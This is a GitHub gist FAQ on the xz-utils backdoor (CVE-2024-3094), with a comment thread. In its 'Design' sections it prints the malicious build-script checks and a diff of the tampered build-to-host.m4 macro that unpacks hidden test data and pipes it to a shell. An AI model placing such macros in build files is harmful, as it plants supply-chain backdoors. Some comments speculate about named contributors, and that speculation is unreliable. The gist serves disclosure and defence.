Skip to content

Instantly share code, notes, and snippets.

@thesamesam
Last active December 21, 2024 19:38
Show Gist options
  • Save thesamesam/223949d5a074ebc3dce9ee78baad9e27 to your computer and use it in GitHub Desktop.
Save thesamesam/223949d5a074ebc3dce9ee78baad9e27 to your computer and use it in GitHub Desktop.
xz-utils backdoor situation (CVE-2024-3094)

FAQ on the xz-utils backdoor (CVE-2024-3094)

This is a living document. Everything in this document is made in good faith of being accurate, but like I just said; we don't yet know everything about what's going on.

Background

On March 29th, 2024, a backdoor was discovered in xz-utils, a suite of software that gives developers lossless compression. This package is commonly used for compressing release tarballs, software packages, kernel images, and initramfs images. It is very widely distributed, statistically your average Linux or macOS system will have it installed for convenience.

This backdoor is very indirect and only shows up when a few known specific criteria are met. Others may be yet discovered! However, this backdoor is at least triggerable by remote unprivileged systems connecting to public SSH ports. This has been seen in the wild where it gets activated by connections - resulting in performance issues, but we do not know yet what is required to bypass authentication (etc) with it.

We're reasonably sure the following things need to be true for your system to be vulnerable:

  • You need to be running a distro that uses glibc (for IFUNC)
  • You need to have versions 5.6.0 or 5.6.1 of xz or liblzma installed (xz-utils provides the library liblzma) - likely only true if running a rolling-release distro and updating religiously.

We know that the combination of systemd and patched openssh are vulnerable but pending further analysis of the payload, we cannot be certain that other configurations aren't.

While not scaremongering, it is important to be clear that at this stage, we got lucky, and there may well be other effects of the infected liblzma.

If you're running a publicly accessible sshd, then you are - as a rule of thumb for those not wanting to read the rest here - likely vulnerable.

If you aren't, it is unknown for now, but you should update as quickly as possible because investigations are continuing.

TL:DR:

  • Using a .deb or .rpm based distro with glibc and xz-5.6.0 or xz-5.6.1:
    • Using systemd on publicly accessible ssh: update RIGHT NOW NOW NOW
    • Otherwise: update RIGHT NOW NOW but prioritize the former
  • Using another type of distribution:
    • With glibc and xz-5.6.0 or xz-5.6.1: update RIGHT NOW, but prioritize the above.

If all of these are the case, please update your systems to mitigate this threat. For more information about affected systems and how to update, please see this article or check the xz-utils page on Repology.

This is not a fault of sshd, systemd, or glibc, that is just how it was made exploitable.

Design

This backdoor has several components. At a high level:

  • The release tarballs upstream publishes don't have the same code that GitHub has. This is common in C projects so that downstream consumers don't need to remember how to run autotools and autoconf. The version of build-to-host.m4 in the release tarballs differs wildly from the upstream on GitHub.
  • There are crafted test files in the tests/ folder within the git repository too. These files are in the following commits:
  • Note that the bad commits have since been reverted in e93e13c8b3bec925c56e0c0b675d8000a0f7f754
  • A script called by build-to-host.m4 that unpacks this malicious test data and uses it to modify the build process.
  • IFUNC, a mechanism in glibc that allows for indirect function calls, is used to perform runtime hooking/redirection of OpenSSH's authentication routines. IFUNC is a tool that is normally used for legitimate things, but in this case it is exploited for this attack path.

Normally upstream publishes release tarballs that are different than the automatically generated ones in GitHub. In these modified tarballs, a malicious version of build-to-host.m4 is included to execute a script during the build process.

This script (at least in versions 5.6.0 and 5.6.1) checks for various conditions like the architecture of the machine. Here is a snippet of the malicious script that gets unpacked by build-to-host.m4 and an explanation of what it does:

if ! (echo "$build" | grep -Eq "^x86_64" > /dev/null 2>&1) && (echo "$build" | grep -Eq "linux-gnu$" > /dev/null 2>&1);then

  • If amd64/x86_64 is the target of the build
  • And if the target uses the name linux-gnu (mostly checks for the use of glibc)

It also checks for the toolchain being used:

  if test "x$GCC" != 'xyes' > /dev/null 2>&1;then
  exit 0
  fi
  if test "x$CC" != 'xgcc' > /dev/null 2>&1;then
  exit 0
  fi
  LDv=$LD" -v"
  if ! $LDv 2>&1 | grep -qs 'GNU ld' > /dev/null 2>&1;then
  exit 0

And if you are trying to build a Debian or Red Hat package:

if test -f "$srcdir/debian/rules" || test "x$RPM_ARCH" = "xx86_64";then

This attack thusly seems to be targeted at amd64 systems running glibc using either Debian or Red Hat derived distributions. Other systems may be vulnerable at this time, but we don't know.

Lasse Collin, the original long-standing xz maintainer, is currently working on auditing the xz.git.

Design specifics

$ git diff m4/build-to-host.m4 ~/data/xz/xz-5.6.1/m4/build-to-host.m4
diff --git a/m4/build-to-host.m4 b/home/sam/data/xz/xz-5.6.1/m4/build-to-host.m4
index f928e9ab..d5ec3153 100644
--- a/m4/build-to-host.m4
+++ b/home/sam/data/xz/xz-5.6.1/m4/build-to-host.m4
@@ -1,4 +1,4 @@
-# build-to-host.m4 serial 3
+# build-to-host.m4 serial 30
 dnl Copyright (C) 2023-2024 Free Software Foundation, Inc.
 dnl This file is free software; the Free Software Foundation
 dnl gives unlimited permission to copy and/or distribute it,
@@ -37,6 +37,7 @@ AC_DEFUN([gl_BUILD_TO_HOST],
 
   dnl Define somedir_c.
   gl_final_[$1]="$[$1]"
+  gl_[$1]_prefix=`echo $gl_am_configmake | sed "s/.*\.//g"`
   dnl Translate it from build syntax to host syntax.
   case "$build_os" in
     cygwin*)
@@ -58,14 +59,40 @@ AC_DEFUN([gl_BUILD_TO_HOST],
   if test "$[$1]_c_make" = '\"'"${gl_final_[$1]}"'\"'; then
     [$1]_c_make='\"$([$1])\"'
   fi
+  if test "x$gl_am_configmake" != "x"; then
+    gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
+  else
+    gl_[$1]_config=''
+  fi
+  _LT_TAGDECL([], [gl_path_map], [2])dnl
+  _LT_TAGDECL([], [gl_[$1]_prefix], [2])dnl
+  _LT_TAGDECL([], [gl_am_configmake], [2])dnl
+  _LT_TAGDECL([], [[$1]_c_make], [2])dnl
+  _LT_TAGDECL([], [gl_[$1]_config], [2])dnl
   AC_SUBST([$1_c_make])
+
+  dnl If the host conversion code has been placed in $gl_config_gt,
+  dnl instead of duplicating it all over again into config.status,
+  dnl then we will have config.status run $gl_config_gt later, so it
+  dnl needs to know what name is stored there:
+  AC_CONFIG_COMMANDS([build-to-host], [eval $gl_config_gt | $SHELL 2>/dev/null], [gl_config_gt="eval \$gl_[$1]_config"])
 ])
 
 dnl Some initializations for gl_BUILD_TO_HOST.
 AC_DEFUN([gl_BUILD_TO_HOST_INIT],
 [
+  dnl Search for Automake-defined pkg* macros, in the order
+  dnl listed in the Automake 1.10a+ documentation.
+  gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`
+  if test -n "$gl_am_configmake"; then
+    HAVE_PKG_CONFIGMAKE=1
+  else
+    HAVE_PKG_CONFIGMAKE=0
+  fi
+
   gl_sed_double_backslashes='s/\\/\\\\/g'
   gl_sed_escape_doublequotes='s/"/\\"/g'
+  gl_path_map='tr "\t \-_" " \t_\-"'
 changequote(,)dnl
   gl_sed_escape_for_make_1="s,\\([ \"&'();<>\\\\\`|]\\),\\\\\\1,g"
 changequote([,])dnl

Payload

If those conditions check, the payload is injected into the source tree. We have not analyzed this payload in detail. Here are the main things we know:

  • The payload activates if the running program has the process name /usr/sbin/sshd. Systems that put sshd in /usr/bin or another folder may or may not be vulnerable.

  • It may activate in other scenarios too, possibly even unrelated to ssh.

  • We don't entirely know the payload is intended to do. We are investigating.

  • Successful exploitation does not generate any log entries.

  • Vanilla upstream OpenSSH isn't affected unless one of its dependencies links liblzma.

    • Lennart Poettering had mentioned that it may happen via pam->libselinux->liblzma, and possibly in other cases too, but...
    • libselinux does not link to liblzma. It turns out the confusion was because of an old downstream-only patch in Fedora and a stale dependency in the RPM spec which persisted long-beyond its removal.
    • PAM modules are loaded too late in the process AFAIK for this to work (another possible example was pam_fprintd). Solar Designer raised this issue as well on oss-security.
  • The payload is loaded into sshd indirectly. sshd is often patched to support systemd-notify so that other services can start when sshd is running. liblzma is loaded because it's depended on by other parts of libsystemd. This is not the fault of systemd, this is more unfortunate. The patch that most distributions use is available here: openssh/openssh-portable#375.

    • Update: The OpenSSH developers have added non-library integration of the systemd-notify protocol so distributions won't be patching it in via libsystemd support anymore. This change has been committed and will land in OpenSSH-9.8, due around June/July 2024.
  • If this payload is loaded in openssh sshd, the RSA_public_decrypt function will be redirected into a malicious implementation. We have observed that this malicious implementation can be used to bypass authentication. Further research is being done to explain why.

    • Filippo Valsorda has shared analysis indicating that the attacker must supply a key which is verified by the payload and then attacker input is passed to system(), giving remote code execution (RCE).

Tangential xz bits

  • Jia Tan's 328c52da8a2bbb81307644efdb58db2c422d9ba7 commit contained a . in the CMake check for landlock sandboxing support. This caused the check to always fail so landlock support was detected as absent.

    • Hardening of CMake's check_c_source_compiles has been proposed (see Other projects).
  • IFUNC was introduced for crc64 in ee44863ae88e377a5df10db007ba9bfadde3d314 by Hans Jansen.

    • Hans Jansen later went on to ask Debian to update xz-utils in https://bugs.debian.org/1067708, but this is quite a common thing for eager users to do, so it's not necessarily nefarious.

People

We do not want to speculate on the people behind this project in this document. This is not a productive use of our time, and law enforcement will be able to handle identifying those responsible. They are likely patching their systems too.

xz-utils had two maintainers:

  • Lasse Collin (Larhzu) who has maintained xz since the beginning (~2009), and before that, lzma-utils.
  • Jia Tan (JiaT75) who started contributing to xz in the last 2-2.5 years and gained commit access, and then release manager rights, about 1.5 years ago. He was removed on 2024-03-31 as Lasse begins his long work ahead.

Lasse regularly has internet breaks and was on one of these as this all kicked off. He has posted an update at https://tukaani.org/xz-backdoor/ and is working with the community.

Please be patient with him as he gets up to speed and takes time to analyse the situation carefully.

Misc notes

Analysis of the payload

This is the part which is very much in flux. It's early days yet.

These two especially do a great job of analysing the initial/bash stages:

Other great resources:

Other projects

There are concerns some other projects are affected (either by themselves or changes to other projects were made to facilitate the xz backdoor). I want to avoid a witch-hunt but listing some examples here which are already been linked widely to give some commentary.

Tangential efforts as a result of this incident

This is for suggesting specific changes which are being considered as a result of this.

Discussions in the wake of this

This is for linking to interesting general discussions, rather than specific changes being suggested (see above).

Non-mailing list proposals:

Acknowledgements

  • Andres Freund who discovered the issue and reported it to linux-distros and then oss-security.
  • All the hard-working security teams helping to coordinate a response and push out fixes.
  • Xe Iaso who resummarized this page for readability.
  • Everybody who has provided me tips privately, in #tukaani, or in comments on this gist.

Meta

Please try to keep comments on the gist constrained to editorial changes I need to make, new sources, etc.

There are various places to theorise & such, please see e.g. https://discord.gg/TPz7gBEE (for both, reverse engineering and OSint). (I'm not associated with that Discord but the link is going around, so...)

Response to questions

  • A few people have asked why Jia Tan followed me (@thesamesam) on GitHub. #tukaani was a small community on IRC before this kicked off (~10 people, currently has ~350). I've been in #tukaani for a few years now. When the move from self-hosted infra to github was being planned and implemented, I was around and starred & followed the new Tukaani org pretty quickly.

  • I'm referenced in one of the commits in the original oss-security post that works around noise from the IFUNC resolver. This was a legitimate issue which applies to IFUNC resolvers in general. The GCC bug it led to (PR114115) has been fixed.

    • On reflection, there may have been a missed opportunity as maybe I should have looked into why I couldn't hit the reported Valgrind problems from Fedora on Gentoo, but this isn't the place for my own reflections nor is it IMO the time yet.

TODO for this doc

  • Add a table of releases + signer?
  • Include the injection script after the macro
  • Mention detection?
  • Explain the bug-autoconf thing maybe wrt serial
  • Explain dist tarballs, why we use them, what they do, link to autotools docs, etc
    • "Explaining the history of it would be very helpful I think. It also explains how a single person was able to insert code in an open source project that no one was able to peer review. It is pragmatically impossible, even if technically possible once you know the problem is there, to peer review a tarball prepared in this manner."

TODO overall

Anyone can and should work on these. I'm just listing them so people have a rough idea of what's left.

  • Ensuring Lasse Collin and xz-utils is supported, even long after the fervour is over
  • Reverse engineering the payload (it's still fairly early days here on this)
    • Once finished, tell people whether:
      • the backdoor did anything else than waiting for connections for RCE, like:
        • call home (send found private keys, etc)
        • load/execute additional rogue code
        • did some other steps to infest the system (like adding users, authorized_keys, etc.) or whether it can be certainly said, that it didn't do so
      • other attack vectors than via sshd were possible
      • whether people (who had the compromised versions) can feel fully safe if they either had sshd not running OR at least not publicly accessible (e.g. because it was behind a firewall, nat, iptables, etc.)
  • Auditing all possibly-tainted xz-utils commits
  • Investigate other paths for sshd to get liblzma in its process (not just via libsystemd, or at least not directly)
    • This is already partly done and it looks like none exist, but it would be nice to be sure.
  • Checking other projects for similar injection mechanisms (e.g. similar build system lines)
  • Diff and review all "golden" upstream tarballs used by distros against the output of creating a tarball from the git tag for all packages.
  • Check other projecs which (recently) introduced IFUNC, as suggested by thegrugq.
    • This isn't a bad idea even outside of potential backdoors, given how brittle IFUNC is.
  • ???

References and other reading material

@AdrianBunk
Copy link

@smintrh78 I've responded there why your suggestion implies that you don't understand the problem.

@teyhouse
Copy link

I did some testing regarding detecting the CVE inside container images. As of right now, it seems the default container Scan from Trivy does not yet detect CVE-2024-3094, but grype does. I would recommend checking on SBOM-Base, for example:
https://github.com/teyhouse/CVE-2024-3094/blob/main/check_sbom.sh

image

@Sepero
Copy link

Sepero commented Mar 31, 2024

If instead of obfuscated code, imagine if the attacker did things a little smarter? Like perhaps an "accidental" buffer overflow (or other memory based exploit)...

@FrankHB
Copy link

FrankHB commented Mar 31, 2024

kill the autools, use meson (the philosophy of meson is : only what is in git should go to the dist, there is even no need for a release, just a tag)

Or take a step further: kill binary distro, use source for confidence, in all serious cases. Binaries are only cache. with no more attack surface.
This also prevents vendor lock-in. Consider when you have a compromised meson...

Dear god, what're you trying to do? Make linux unusable? We have gentoo for this which, by the way, was also affected by this XZ backdoor. "Make every distro compiled..."

You seem to forget not everyone has a top of the line CPU. God forbid you like google chrome or any proprietary software...

This has nothing to Linux itself, as this can be a pure userland thing, and I don't say it should prevent you to specify any "source" in the form of precompiled binaries (including the kernel image) once you are already confident enough.

The key point is to make sure each piece of binary code (except locally developed by users) totally artifacts from some really auditable source which is actually used by the system, rather than just some ramdom source packages separately maintained by the upstream repo admins.

This is not far from the spirit of meson mentioned here. It is just a strategy enforced in the whole system by default.

Gentoo is not that unusable the binary cache is effectively shared. A more significant problem is, it seems so unfriendly to carbon footprint in any serious configuration... It is certainly a nonstarter for most users lacking the knowledge about what happens under the hood (esp. to distinguish which parts of the building during the installation are actually totally redundant).

To share the cache efficiently, you have to share the configuartions to precisely reproduce the builds of almost any pieces of software in the system. Unfortunately, most binary distros lack the mechanism to handle such things systemtically. In my best knowledge, nix and guix are a few to get such things virtually right in the basis (purely functional configuration versioning), but still too far from most industrial users.

This also won't automatically solve the problems of inefficient build system, though.

@wtznc
Copy link

wtznc commented Mar 31, 2024

GitHub has just restored access to his account. There may be many more repositories where malicious code can be found - e.g. llvm compiler llvm/llvm-project#63957

@SyntaxDreamer
Copy link

btw, I see mention of W11, isn't there also WSL running debian and Ubuntus ? Any potential impact ?

If you've updated either recently, that included the affected packages, enabled systemd and ran sshd that was available openly then yes. But that's a very long stretch as systemd isn't even on by default in WSL.

THIS IS NOT TRUE! A LOT OF DISTROS INCLUDING UBUNTU RUN SYSTEMD BY DEFAULT IN WSL

How do I know that? I made a few distro packages for WSL, some of them even public :). Let's check the default Ubuntu on WSL2:

PS C:\Users\Alex> wsl -d Ubuntu
alex@citadel:/mnt/c/Users/Alex$ ps aux | head -2
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.2  0.0 165764 11260 ?        Ss   15:02   0:00 /sbin/init
alex@citadel:/mnt/c/Users/Alex$ ll /sbin/init
lrwxrwxrwx 1 root root 20 Sep 20  2023 /sbin/init -> /lib/systemd/systemd*
alex@citadel:/mnt/c/Users/Alex$ cat /etc/wsl.conf

[boot]
systemd=true

https://learn.microsoft.com/en-us/windows/wsl/systemd
@TyrHeimdalEVE @thesamesam @Z-nonymous The WSL systems might be vulnerable.

So what? Are we now starting to fix Microsoft's problems? Funny, where Linux stands now at the moment, as some kind of Microsoft Windows subsystem?

An infected host, regardless of where or how it is running, affects everyone equally. DoS attacks, spam, relays, etc. Does it matter if it's running under Windows WLS, a VM or docker? No, it does not.

@Leseratte10
Copy link

GitHub has just restored access to his account.

Doesn't look like it. "JiaT75" is still suspended.

@NuLL3rr0r
Copy link

Somebody created this single page analysis on Twitter.

Also this gist is very intersting.
1000061068

@Leseratte10
Copy link

Leseratte10 commented Mar 31, 2024

You're looking in the wrong place. Just because you can see the profile doesn't mean the user isn't suspended

screenshot

@thimslugga
Copy link

GitHub has just restored access to his account. There may be many more repositories where malicious code can be found - e.g. llvm compiler llvm/llvm-project#63957

Perfect, now they can return back to doing their part as a little “helper elf”. Lol, perhaps a very subtle cue to what they had on their mind.

Just trying to do my part as a helper elf!

Jia Tan

https://www.mail-archive.com/xz-devel@tukaani.org/msg00518.html

@wtznc
Copy link

wtznc commented Mar 31, 2024

This situation made me wonder how many other such libraries are developed by (mostly) one person and end up in most Linux distributions, but the author is not actively involved in their development. This is a potential vector for further attacks. I am very curious about the social aspect - how this relationship and trust was built between the authors.

@Fearyncess
Copy link

Fearyncess commented Mar 31, 2024

If you've updated either recently, that included the affected packages, enabled systemd and ran sshd that was available openly then yes. But that's a very long stretch as systemd isn't even on by default in WSL.

Thank you.

@Z-nonymous I'm not sure what your point is there... xry111 just misunderstood whatever the OpenSSL procedure is. t8m and slontis are both well-known, longstanding members of the OpenSSL team.

Just asking if they really reviewed. for side effects

I don't say they submit faulty code _they might be sometimes on good faith wrongly approving stuff from a bad actor that ends up having side effects. that's why I noted the pure issue. They maybe really want to push Loongson arch support and are played.

xry111 and xen0n are both maintainers of some of the loong ports in the kernel/toolchain and I'm not surprised they show up to review other changes to core packages where the changes are specific to loong...

I'm making correlations, asking advice. i.e. liblzma_la-crc64-fast.o is the backdoor as per https://gynvael.coldwind.pl/?id=782 xry111 was also commit code for LoongArch for CRC code in xv approved by JiaT75 in tukaani-project/xz#86

, loong isn't exactly a big target.

Well, I need to further investigate, there has been reviews from them in many code/functions modules that are in the analysis from thread in https://www.openwall.com/lists/oss-security/2024/03/29/4 that have been modified for LoongArch in some form The breath of area they are contributing (comments, reviews, approvals, PRs) in that team is everywhere, Compilation, system services, ssl, crypto, kernel, localization, html, assembly, c, rust, node, nvm, dosbox,

They can't potentially know every possible implications of updates in such a large code base.

Again: I don't say they submit faulty code _they might be sometimes on good faith wrongly approving stuff from a bad actor that ends up having side effect they don't apprehend. I will review make-ca but maybe there are places

In any case, to me, this looks a bit like a witch-hunt against two people who are Chinese.

Do you know these people IRL ? Do you know the people they approve the PRs of ? How do you know any GH user is Chinese ? Only real police/federal/interpol investigation can determine that. Even then sometimes they could arrest someone who happened to have found a usb key in Latvia instead of a Russian agent.

I've worked with many Chinese colleages in research & engineering, they are as brilliant minds as anyone. I never implied anything Chinese-related, maybe my fault was trying to explain that Loongson is a Chinese CPU manufacturer for context. I even ever say they were actually from that company. I just assumed they implement support for it.

They might be played by people complaing about bad Loongson support, providing engineered reports, forcing to make changes they don't always understand the side effects.

If you've updated either recently, that included the affected packages, enabled systemd and ran sshd that was available openly then yes. But that's a very long stretch as systemd isn't even on by default in WSL.

Thank you.

By your words, a "25-year Unix commercial TALENT" smells in this thread like a JiaT75's partner, even himself. Because you are spreading misinformation and trying to slander the other person, that also can be a part of THIS APT. Don't you think so?

@Carnildo
Copy link

If instead of obfuscated code, imagine if the attacker did things a little smarter? Like perhaps an "accidental" buffer overflow (or other memory based exploit)...

Truly accidental buffer overflows are so common that most systems have protections against them. The days of simply dropping shellcode on the stack are long gone.

@imelon123
Copy link

I am not familiar with coding, but on 2024-02-12, the commit timestamps (and timezones) of 'jiat0218' were exactly the same as those of Lasse Collin. Is it expected?

commit e0c0ee475c0800c08291ae45e0d66aa00d5ce604
Author: Lasse Collin <lasse.collin@tukaani.org>
Date:   2024-02-12 17:09:10 +0200

...

commit de5c5e417645ad8906ef914bc059d08c1462fc29
Author: Jia Tan <jiat0218@gmail.com>
Date:   2024-02-12 17:09:10 +0200

...

commit e446ab7a18abfde18f8d1cf02a914df72b1370e3
Author: Jia Tan <jiat0218@gmail.com>
Date:   2024-02-12 17:09:10 +0200

...

commit 7f6d9ca329ff3e01d4b0be7366eb4f5c93da41b9
Author: Lasse Collin <lasse.collin@tukaani.org>
Date:   2024-02-12 17:09:10 +0200

https://raw.githubusercontent.com/freebsd/freebsd-src/ee36e7faceafeef05c5e81654a1d8ec11d314894/contrib/xz/ChangeLog

@ItzSwirlz
Copy link

I am not familiar with coding, but on 2024-02-12, the commit timestamps (and timezones) of 'jiat0218' were exactly the same as those of Lasse Collin. Is it expected?

commit e0c0ee475c0800c08291ae45e0d66aa00d5ce604
Author: Lasse Collin <lasse.collin@tukaani.org>
Date:   2024-02-12 17:09:10 +0200

...

commit de5c5e417645ad8906ef914bc059d08c1462fc29
Author: Jia Tan <jiat0218@gmail.com>
Date:   2024-02-12 17:09:10 +0200

...

commit e446ab7a18abfde18f8d1cf02a914df72b1370e3
Author: Jia Tan <jiat0218@gmail.com>
Date:   2024-02-12 17:09:10 +0200

...

commit 7f6d9ca329ff3e01d4b0be7366eb4f5c93da41b9
Author: Lasse Collin <lasse.collin@tukaani.org>
Date:   2024-02-12 17:09:10 +0200

https://raw.githubusercontent.com/freebsd/freebsd-src/ee36e7faceafeef05c5e81654a1d8ec11d314894/contrib/xz/ChangeLog

Probably modifying and tampering with git commits manually

@thesamesam
Copy link
Author

Just keep in mind that this is kind of normal when applying someone else's commits via rebase or git am, especially if patches got emailed or similar. Not saying that is what happened here but it's not super abnormal either.

@crrodriguez
Copy link

IFUNC was added to enable this attack. Is IFUNC actually useful for anything legitimate? I know the attacker convinced glibc that it was, but... it's glibc, they love useless features that complicate everything.

Edit: and in particular, does IFUNC have the potential to reduce security by design?

ifunc is an ELF feature that is used to select target-specific optimizations in glibc, in order to pick the fastest routine for your hardware of basic functions, for example memcpy , all the math routines ..all from a single library and not dozens or hundreds of different builds to target all user hardware.
some basic explanation here https://jasoncc.github.io/gnu_gcc_glibc/gnu-ifunc.html

@thesamesam
Copy link
Author

IFUNC was probably not worth using here and Lasse wasn't really in love with it as he felt it was a lot of complexity, but it isn't useless or anything in general either. But I must admit I did not say it should be removed or anything like that.

@w-flo
Copy link

w-flo commented Apr 1, 2024

commit timestamps (and timezones) of 'jiat0218' were exactly the same as those of Lasse Collin

Looking at the repo, eg. here, all 4 commits were commited by Lasse Collin at the same time on Feb 14. He probably received 2 of these commits from Jia Tan (maybe through pull request) and reset the date for all 4 commits, maybe after rebasing to solve merge conflicts, two days before commiting them all at the same time. I'd say that's not suspicious.

@imelon123
Copy link

imelon123 commented Apr 1, 2024

@thesamesam Is this a known issue, and can it be reproduced? Given that the timestamps (and timezones) are exactly the same, the only explanation is that they were triggered by the same person. Since it occurred in February 2024, just a few days before the backdoor was installed, it is probably worth being alerted.

In almost all commit logs, Jia Tan uses the +800 timezone, except for the one above and the following one:

commit 86118ea320f867e09e98a8682cc08cbbdfd640e2
Author: Jia Tan <jiat0218@gmail.com>
Date:   2023-06-27 23:38:32 +0800					--> +800	Jia Tan		2023-06-27 23:38:32 +0800 (18:38:32 +0300)

    Update THANKS.

 THANKS | 1 +
 1 file changed, 1 insertion(+)

commit 3d1fdddf92321b516d55651888b9c669e254634e
Author: Jia Tan <jiat0218@gmail.com>
Date:   2023-06-27 17:27:09 +0300					--> +300	Jia Tan		2023-06-27 17:27:09 +0300

    Docs: Document the configure option --disable-ifunc in INSTALL.

 INSTALL | 8 ++++++++
 1 file changed, 8 insertions(+)

commit b4cf7a2822e8d30eb2b12a1a07fd04383b10ade3
Author: Lasse Collin <lasse.collin@tukaani.org>
Date:   2023-06-27 17:24:49 +0300					--> +300	Lasse Collin	2023-06-27 17:24:49 +0300

He switched between the +300 and +800 timezones?

Note that in this case, the timestamps were not the same, so they were unlikely triggered by the same command or commit.

@AdrianBunk
Copy link

@thesamesam
https://bugs.debian.org/1067708
https://git.tukaani.org/?p=xz.git;a=commit;h=ee44863ae88e377a5df10db007ba9bfadde3d314

"Hans Jansen" seems to be another alias of "Jia Tan" (or the alias of a different member of the attacker team).

@xry111
Copy link

xry111 commented Apr 1, 2024

If you apply a patch sent to you from another person (or maybe not a person, whatever) with patch -Np1 then git commit --author=..., the timestamp (including time zone) will be yourselves.

I'd always use git am instead, but AFAIK some people do not. (Edit: and git am is somehow more strict than patch -Np1, so if git am fails but patch -Np1 works people may just commit it with git commit --author=... after visually inspecting the change anyway.)

@thesamesam
Copy link
Author

@x1done b4cf7a2822e8d30eb2b12a1a07fd04383b10ade3 looks OK to me in terms of content. I have a clone from a fair while ago and I don't think any force pushes occurred.

I suspect Lasse applied those and just ended up mangling the timestamps (others have mentioned some scenarios about how it could happen with git am, but it might be worth asking him (once the important stuff is dealt with). Not everyone is super comfortable with git branches so it might be that he exported his own changes and reapplied them later, or similar.

@thesamesam
Copy link
Author

thesamesam commented Apr 1, 2024

@AdrianBunk Thanks. I will reflect on if this should be included. It's hard because I do not want to encourage a witch hunt and it's mentioned in some references I included. If you have a suggestion for how I could include it without it sounding accusatory, then that would be helpful.

EDIT: Maybe I could mention it in the context of when the IFUNC stuff got introduced.

@AdrianBunk
Copy link

Is this a known issue, and can it be reproduced? Given that the timestamps (and timezones) are exactly the same, the only explanation is that they were triggered by the same person.

@x1done Some batch action was done by the same person (Lasse).

You can reproduce the effect in many ways, for example with:

git format-patch -2
git reset --hard HEAD^^
git am --ignore-date 000*

From looking at the (untampered) autoconf code I got the impression that Lasse is (like me) someone who was already developing software in the 1990s, many years before git was written. People who started coding before git existed often have some pre-git habits in their workflows since you usually don't change everything when starting to use a new tool, it wouldn't shock me if what happened for example included such an export to patches and then re-import to git.

@thesamesam
Copy link
Author

@AdrianBunk This matches my understanding on all parts.

@imelon123
Copy link

imelon123 commented Apr 1, 2024

@thesamesam To be honest, here I'm not really interested in what was committed, but rather about the timezone and timestamps, especially the following one:

commit 3d1fdddf92321b516d55651888b9c669e254634e
Author: Jia Tan <jiat0218@gmail.com>
Date:   2023-06-27 17:27:09 +0300					--> +300	Jia Tan		2023-06-27 17:27:09 +0300

    Docs: Document the configure option --disable-ifunc in INSTALL.

 INSTALL | 8 ++++++++
 1 file changed, 8 insertions(+)

I don't think it was a commit triggered from account 'Lasse Collin', as there were no other events at the same timestamp. In that case, it should be from account Jia Tan itself. This raises the question, why did Jia Tan change his timezone to +300?

@thesamesam
Copy link
Author

thesamesam commented Apr 1, 2024

@x1done But doesn't this match Lasse's TZ (for half the year or w/e)? The point being it looks like Lasse pushed it (author vs committer). It's been covered how the time might change to Lasse's when applying a patch from someone else.

EDIT: xry111 rightly points out in https://gist.github.com/thesamesam/223949d5a074ebc3dce9ee78baad9e27?permalink_comment_id=5007558#gistcomment-5007558 that the pusher may be a third person and this isn't represented in git metadata.

@ItzSwirlz
Copy link

@x1done daylight savings?

@xry111
Copy link

xry111 commented Apr 1, 2024

@x1done But doesn't this match Lasse's TZ (for half the year or w/e)? The point being it looks like Lasse pushed it (author vs committer).

Both the author and the committer is Jia Tan:

$ git show 3d1fdddf92321b516d55651888b9c669e254634e --format=fuller | head
commit 3d1fdddf92321b516d55651888b9c669e254634e
Author:     Jia Tan <jiat0218@gmail.com>
AuthorDate: Tue Jun 27 17:27:09 2023 +0300
Commit:     Jia Tan <jiat0218@gmail.com>
CommitDate: Tue Jun 27 23:56:06 2023 +0800

    Docs: Document the configure option --disable-ifunc in INSTALL.

diff --git a/INSTALL b/INSTALL
index 7fb41fa6..b64c56c5 100644

But the person pushed this commit is allowed to be neither author nor committer. (I.e. it may happen that A authored the change, B committed the change, and C pushed the change.)

It's not possible to find the person pushed the commit with git CLI. AFAIK there is some GitHub API to figure out when and who pushed a commit. However the repo is under suspension, and even it's not I still don't know if this approach will work when the GitHub repo is only a mirror.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment